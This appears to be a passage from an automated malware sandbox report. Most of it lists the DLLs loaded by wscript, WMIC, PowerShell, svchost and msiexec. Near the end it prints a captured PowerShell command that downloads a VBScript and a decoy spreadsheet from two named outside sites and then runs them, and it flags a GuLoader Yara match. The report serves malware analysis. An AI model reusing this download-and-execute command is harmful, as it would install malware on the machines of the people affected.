                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeSection loaded: mswsock.dll
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000010.00000003.2264946389.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265037346.0000000021280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268176659.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268247036.0000000005980000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265773388.0000000021380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268669701.0000000005A80000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 00000010.00000003.2264043977.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264174243.0000000021350000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267316801.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267524713.0000000005A50000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000010.00000003.2264557914.0000000021300000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264398519.0000000021160000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267843844.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268003747.0000000005A00000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 00000010.00000003.2264043977.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264174243.0000000021350000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267316801.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267524713.0000000005A50000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000010.00000003.2264557914.0000000021300000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264398519.0000000021160000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267843844.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268003747.0000000005A00000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.2116070687.0000000006E9B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmpshare.exe
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000010.00000003.2264946389.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265037346.0000000021280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268176659.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268247036.0000000005980000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265773388.0000000021380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268669701.0000000005A80000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2116070687.0000000006E34000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run "powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'", 0IWshShell3.Run("powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url", "0")
                        Yara detected GuLoader
                        Source: Yara matchFile source: 00000010.00000003.2266888883.0000000004603000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2125331171.0000000008A43000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2125078968.0000000008140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
